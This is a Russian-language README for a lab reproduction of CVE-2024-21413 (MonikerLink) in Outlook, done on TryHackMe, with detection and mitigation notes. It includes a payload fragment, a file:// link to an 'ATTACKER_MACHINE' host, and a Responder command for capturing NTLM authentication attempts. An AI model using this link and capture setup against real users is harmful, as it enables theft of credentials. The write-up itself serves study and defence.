
Этот репозиторий содержит исследовательские заметки и высокоуровневый proof-of-concept (PoC) для CVE-2024-21413 — уязвимости, наблюдаемой в некоторых почтовых клиентах при обработке SMB/moniker-стилей ссылок, встроенных в сообщения. PoC и эксперименты, описанные здесь, были выполнены в контролируемой лабораторной среде на системах.
Этот проект воспроизводит поведение MonikerLink (CVE-2024-21413) в полностью изолированной среде TryHackMe, чтобы показать, как определенные форматы гиперссылок могут заставить Outlook обрабатывать ссылку таким образом, что это приводит к утечке попыток аутентификации или к дальнейшей эксплуатации. Результатом является PoC, а также приоритетный набор мер по смягчению последствий и рекомендаций по обнаружению, которые могут применить группы безопасности. Атаки на живые/несанкционированные системы не проводились.
| Инструмент / Навык | Назначение |
|---|---|
| Python | Разработка скриптов |
| Linux (Kali) | Целевая система |
| Metasploit | Эксплуатация и доступ |
| TryHackMe Lab | Контролируемая среда |
Этот код написан CMNatic и находится здесь
Например, в строке “<a href=“file://ATTACKER_MACHINE/test!” я заменил "ATTACKER_MACHINE" на IP-адрес атакующей машины, а в строке “server = smtplib.SMTP('MAILSERVER', 25)” я изменил "MAILSERVER" на IP-адрес машины жертвы.
responder -I ens5
systemctl start systemd-resolved

Эта proof-of-concept демонстрирует нюанс обработки ссылок в Microsoft Outlook: определенные ссылки-моникеры вида file://, ссылающиеся на ресурсы SMB, могут обходить стандартную фильтрацию Outlook и провоцировать исходящие попытки аутентификации. Показанное поведение воспроизведено в полностью контролируемой лаборатории TryHackMe и подчеркивает, как, казалось бы, безобидные форматы ссылок могут маскировать сетевые взаимодействия. Хотя выпущены исправления от вендора и рекомендации по обнаружению, лежащие в основе механизмы остаются сложными из-за легитимного использования схемы моникеров/файлов. Важно отметить, что активность, генерируемая этим PoC, наблюдаема на сетевом уровне (например, в захватах пакетов, показывающих попытки аутентификации NTLM), что делает её пригодной для криминалистического анализа и расследования инцидентов.
Правило Yara, созданное Florian Roth, для обнаружения писем, содержащих элемент :file:\:.
